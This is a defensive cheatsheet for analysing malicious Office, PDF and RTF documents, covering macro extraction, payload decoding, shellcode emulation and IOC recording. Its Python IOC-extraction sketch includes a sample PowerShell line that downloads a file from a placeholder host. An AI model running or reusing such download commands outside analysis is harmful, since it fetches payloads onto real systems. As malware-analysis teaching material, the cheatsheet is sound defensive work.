============================================================
Malicious Document Analysis
============================================================

Analyze suspicious documents (PDF, Office, RTF, OneNote) for embedded malware, macros, and exploits. Follows Zeltser's 6-step methodology.

Related FOR610 Labs: 3.1, 3.3, 3.4, 3.5

────────────────────────────────────────────────────────────

Step 1: Format Identification
Tools: file, trid
Identify the true format: OLE2 (legacy Office), OOXML (modern Office), RTF, PDF, OneNote. Don't trust the file extension; check the magic bytes.
  $ file specimen.exe
  $ trid document.doc

Step 2: Structure Analysis
Tools: oledump-py, rtfdump-py, pdfid-py, pdf-parser-py, onedump-py
Parse document internals. For Office: use oledump.py to list streams (M = macro). For PDF: use pdfid.py to count risky keywords (/JavaScript, /OpenAction). For RTF: use rtfdump.py to find hex-heavy groups.
  $ oledump.py document.docm
  $ rtfdump.py document.rtf
  $ pdfid.py document.pdf
  $ pdf-parser.py document.pdf -a

Step 3: Password Handling (if encrypted)
Tools: msoffcrypto-tool
If the document is password-protected: msoffcrypto-tool -p . Common passwords: infected, malware, password, 123456.
  $ msoffcrypto-tool -p infected

Step 4: Macro/Script Extraction
Tools: oledump-py, olevba, pcode2code, XLMMacroDeobfuscator
Extract VBA: oledump.py -s -v. For p-code: pcode2code. For Excel 4.0 macros: XLMMacroDeobfuscator. Check the olevba output for auto-execute triggers (AutoOpen, Document_Open).
  $ oledump.py document.docm
  $ olevba document.docm
  $ pcode2code
  $ xlmdeobfuscator --file

Step 5: Payload Decoding
Tools: base64dump-py, translate-py, gunzip, numbers-to-string-py, cyberchef
Decode embedded payloads. Common chains: Base64 → gunzip → XOR. Use CyberChef for visual multi-step decoding and translate.py for byte-level transforms (byte ^ key).
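The Base64 → gunzip → XOR chain can also be reproduced in a few lines of Python when the tools are not at hand. This is a minimal sketch, not part of the cheatsheet's toolset: the function names decode_chain and encode_chain are hypothetical, the XOR is assumed to use a single-byte key (35, matching the translate.py example), and the sample data is a harmless placeholder.

```python
import base64
import gzip


def decode_chain(blob: bytes, xor_key: int) -> bytes:
    """Apply Base64 decode -> gunzip -> single-byte XOR, in that order."""
    compressed = base64.b64decode(blob)
    xored = gzip.decompress(compressed)
    # Same transform as translate.py "byte ^ key", applied to every byte.
    return bytes(b ^ xor_key for b in xored)


def encode_chain(plain: bytes, xor_key: int) -> bytes:
    """Inverse of decode_chain; used here only to build a benign test sample."""
    xored = bytes(b ^ xor_key for b in plain)
    return base64.b64encode(gzip.compress(xored))


if __name__ == "__main__":
    # Hypothetical sample: a placeholder URL wrapped in the three layers.
    sample = encode_chain(b"http://example.test/payload", 35)
    print(decode_chain(sample, 35))
```

Real specimens often reorder or repeat these layers, so treat the order here as one assumed chain and adjust it to whatever the extracted macro actually does.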
  $ base64dump.py file.txt
  $ translate.py "byte ^ 35" < input.bin > output.bin
  $ gunzip -c compressed.gz > output.bin
  $ oledump.py doc.docm -s A3 -v | numbers-to-string.py -j
  $ cyberchef

Step 6: Embedded Object Analysis
Tools: scdbgc, xorsearch, yara, 1768-py
If shellcode found: emulate with scdbgc. Scan for known patterns (YARA). Check for Cobalt Strike beacons (1768.py). Route PE payloads to Static Analysis Workflow.
  $ scdbgc /f shellcode.bin /s -1
  $ XORSearch -W -d 3 file.bin
  $ yara-rules specimen.bin
  $ 1768.py shellcode.bin

Step 7: Document IOCs
Record: embedded URLs, downloaded payload hashes, C2 addresses, macro behavior (what APIs called), exploit type (CVE if applicable).

────────────────────────────────────────────────────────────

Tip: 'fhelp cheat ' for full examples
     'Ctrl+G' for interactive cheatsheet browser
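
For Step 7, part of the IOC record (payload hash and embedded URLs) can be collected automatically from a decoded payload. The following is a minimal sketch under stated assumptions: build_ioc_record and its field names are hypothetical, the URL pattern is a deliberately simple regex that will miss obfuscated or split URLs, and the demo bytes are a benign placeholder.

```python
import hashlib
import json
import re

# Simple pattern (an assumption): http/https URLs up to whitespace, quotes, or angle brackets.
URL_RE = re.compile(rb"https?://[^\s\"'<>]+")


def build_ioc_record(payload: bytes) -> dict:
    """Return the SHA-256, size, and de-duplicated URLs found in a payload."""
    urls = sorted({m.decode("ascii", "replace") for m in URL_RE.findall(payload)})
    return {
        "sha256": hashlib.sha256(payload).hexdigest(),
        "size": len(payload),
        "urls": urls,
    }


if __name__ == "__main__":
    # Hypothetical decoded macro output containing two placeholder URLs.
    demo = b'powershell -c "IWR http://example.test/a.bin" ; http://example.test/b'
    print(json.dumps(build_ioc_record(demo), indent=2))
```

C2 addresses, macro API behavior, and exploit type still need to be recorded by hand from the earlier steps; this sketch only covers what can be read directly from the bytes.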